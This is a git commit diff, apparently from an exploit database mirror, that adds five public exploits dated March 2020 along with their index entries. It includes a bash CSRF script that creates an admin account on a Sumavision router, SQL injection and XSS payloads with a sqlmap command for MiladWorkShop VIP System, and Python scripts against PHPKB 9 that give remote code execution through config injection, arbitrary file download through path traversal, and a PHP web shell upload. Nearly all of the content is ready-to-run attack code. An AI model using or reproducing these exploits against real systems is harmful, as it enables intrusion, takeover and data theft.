DB: 2020-03-17
5 changes to exploits/shellcodes Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin) MiladWorkShop VIP System 1.0 - 'lang' SQL Injection PHPKB Multi-Language 9 - Authenticated Remote Code Execution PHPKB Multi-Language 9 - Authenticated Directory Traversal PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution
This commit is contained in:
parent
9bacc6784a
commit
72f1d24f1a
6 changed files with 168 additions and 0 deletions
28
exploits/asp/webapps/48217.txt
Normal file
28
exploits/asp/webapps/48217.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
|
||||
# Date: 2020-03-05
|
||||
# Exploit Author: Miguel Mendez Z.
|
||||
# Vendor Homepage: www.sumavision.com
|
||||
# Software Link: http://www.sumavision.com/ensite/i.php?id=29
|
||||
# Version: EMR 3.0.4.27
|
||||
# CVE : CVE-2020-10181
|
||||
|
||||
-----------------------Exploit Bash---------------------------
|
||||
echo ""
|
||||
read -p "Set Hostname: " host
|
||||
read -p "Set username: " user
|
||||
echo "(The password should be between 6 and 32 in length)"
|
||||
read -p "Set password: " pass
|
||||
echo
|
||||
echo "[+] creating user..."
|
||||
sleep 2
|
||||
postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0")
|
||||
if echo "$postdata" | grep -q "0</html>"; then
|
||||
echo "[+] http://$host/frame_en.asp"
|
||||
echo "[+] created access($user - $pass)"
|
||||
else
|
||||
echo "[-] user not created"
|
||||
fi
|
||||
------------------------------------------------------
|
||||
|
||||
Reference:
|
||||
https://github.com/s1kr10s/Sumavision_EMR3.0/blob/master/exploit_sumavision.sh
|
33
exploits/php/webapps/48218.txt
Normal file
33
exploits/php/webapps/48218.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection
|
||||
# Google Dork: Powered By MiladWorkShop VIP System
|
||||
# Date: 2020-03-03
|
||||
# Exploit Author: AYADI Mohamed
|
||||
# email : ayadi.mohamed@outlook.com
|
||||
# Vendor Homepage: https://miladworkshop.ir/
|
||||
# Software Link: https://miladworkshop.ir/vip.html
|
||||
# Version: 1.x
|
||||
# Tested on: Kali Linux (sqlmap)
|
||||
# CVE : N/A
|
||||
|
||||
|
||||
[ SQL injection exploitation ]
|
||||
|
||||
Address : http://vip.target/forget
|
||||
Request Type : Post
|
||||
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause
|
||||
Payload: lang=en AND 3-4400' OR 6146=6146-- ivGZ21=6 AND 000wM2X=000wM2X
|
||||
|
||||
Type: time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
Payload: lang=en AND 3' AND (SELECT 2915 FROM (SELECT(SLEEP(50)))StCO)-- vkVG21=6 AND 000wM2X=000wM2X
|
||||
|
||||
example :
|
||||
sqlmap -u "http://vip.target/forget" --data lang=en'%20AND%203*2*1%3d6%20AND%20'000wM2X'%3d'000wM2X --random-agent --banner --ignore-prox --hex --level 3 --risk 3 --time-sec=6 --timeout 100 --tamper="between.py"
|
||||
|
||||
|
||||
[ XSS exploitation ]
|
||||
http://vip.target/%22%3E%3Cimg%20src=%22aa%22%20onerror=%22alert(1)%22%3E%3C
|
||||
|
||||
#creetz to all Morrocans cyber security
|
37
exploits/php/webapps/48219.py
Executable file
37
exploits/php/webapps/48219.py
Executable file
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-03-15
|
||||
# Exploit Author: Antonio Cannito
|
||||
# Vendor Homepage: https://www.knowledgebase-script.com/
|
||||
# Software Link: https://www.knowledgebase-script.com/pricing.php
|
||||
# Version: Multi-Language v9
|
||||
# Tested on: Windows 8.1 / PHP 7.4.3
|
||||
# CVE : CVE-2020-10389
|
||||
|
||||
|
||||
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import requests
|
||||
|
||||
|
||||
#Parsing arguments
|
||||
parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10389 - Authenticated Remote Code Execution in Chadha PHPKB Standard Multi-Language 9 in admin/save-settings.php")
|
||||
parser.add_argument("url", type=str, help="PHPKB's base path")
|
||||
parser.add_argument("username", type=str, help="Superuser username")
|
||||
parser.add_argument("password", type=str, help="Superuser password")
|
||||
parser.add_argument("cmd", type=str, help="The command you want executed")
|
||||
args = parser.parse_args()
|
||||
|
||||
session = requests.Session()
|
||||
#Perform login
|
||||
session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
|
||||
#Sending exploit code and downloading the file
|
||||
exp = """' . system("{}") . '""".format(args.cmd)
|
||||
data = {"putdown_for_maintenance": "no{}".format(exp), "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "tet@test.com", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
|
||||
url = args.url + "/admin/manage-settings.php"
|
||||
session.post(url, data=data)
|
||||
print(session.get(args.url + "admin/include/configuration.php").text.encode('utf-8'))
|
||||
#Resetting settings
|
||||
data = {"putdown_for_maintenance": "no{}", "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "tet@test.com", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
|
||||
session.post(url, data=data)
|
34
exploits/php/webapps/48220.py
Executable file
34
exploits/php/webapps/48220.py
Executable file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-03-15
|
||||
# Exploit Author: Antonio Cannito
|
||||
# Vendor Homepage: https://www.knowledgebase-script.com/
|
||||
# Software Link: https://www.knowledgebase-script.com/pricing.php
|
||||
# Version: Multi-Language v9
|
||||
# Tested on: Windows 8.1 / PHP 7.4.3
|
||||
# CVE : CVE-2020-10387
|
||||
##########################
|
||||
|
||||
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import requests
|
||||
import shutil
|
||||
|
||||
#Parsing arguments
|
||||
parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10387 - Authenticated Arbitrary File Download in admin/download.php in Chadha PHPKB Standard Multi-Language 9")
|
||||
parser.add_argument("url", type=str, help="PHPKB's base path")
|
||||
parser.add_argument("username", type=str, help="Superuser username")
|
||||
parser.add_argument("password", type=str, help="Superuser password")
|
||||
parser.add_argument("file", type=str, help="The file you want to download (starting from PHPKB's base path)")
|
||||
args = parser.parse_args()
|
||||
|
||||
session = requests.Session()
|
||||
#Perform login
|
||||
session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
|
||||
#Sending exploit code and downloading the file
|
||||
url = args.url + "/admin/download.php?called=ajax&act=backup-lang&file=../../" + args.file
|
||||
ext = url.split("/")[-1]
|
||||
with open(ext, 'wb') as file:
|
||||
shutil.copyfileobj(session.get(url, stream=True).raw, file)
|
||||
del session
|
31
exploits/php/webapps/48221.py
Executable file
31
exploits/php/webapps/48221.py
Executable file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-03-15
|
||||
# Exploit Author: Antonio Cannito
|
||||
# Vendor Homepage: https://www.knowledgebase-script.com/
|
||||
# Software Link: https://www.knowledgebase-script.com/pricing.php
|
||||
# Version: Multi-Language v9
|
||||
# Tested on: Windows 8.1 / PHP 7.4.3
|
||||
# CVE : CVE-2020-10386
|
||||
|
||||
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import requests
|
||||
from json import loads
|
||||
|
||||
#Parsing arguments
|
||||
parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10386 - Remote Code Execution via .php file upload in admin/imagepaster/image-upload.php in Chadha PHPKB Standard Multi-Language 9")
|
||||
parser.add_argument("url", type=str, help="PHPKB's base path")
|
||||
parser.add_argument("username", type=str, help="Superuser/Writer/Translator/Editor username")
|
||||
parser.add_argument("password", type=str, help="Superuser/Writer/Translator/Editor password")
|
||||
parser.add_argument("command", type=str, help="The command you want to execute")
|
||||
args = parser.parse_args()
|
||||
|
||||
session = requests.Session()
|
||||
#Perform login
|
||||
session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
|
||||
#Sending exploit code
|
||||
baseurl = loads(session.post(args.url + "/admin/imagepaster/image-upload.php", files={'file': "<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>"}, data={'action': 'imageinsert_upload', 'imgMime': 'image/php', 'imgName': '../js/index.png', 'imgParent': 'null'}).text)["url"]
|
||||
print("Visit this page to execute the command:\n" + baseurl + "?cmd=" + args.command)
|
||||
print("\nIf you want to execute other commands you can re-execute the exploit or visit this webpage, followed by the command you want executed:\n" + baseurl + "?cmd=")
|
|
@ -42471,3 +42471,8 @@ id,file,description,date,author,type,platform,port
|
|||
48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
|
||||
48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,
|
||||
48215,exploits/php/webapps/48215.sh,"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution",2020-03-10,"Andrea Cardaci",webapps,php,
|
||||
48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,
|
||||
48218,exploits/php/webapps/48218.txt,"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection",2020-03-16,"AYADI Mohamed",webapps,php,
|
||||
48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
|
||||
48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
|
||||
48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue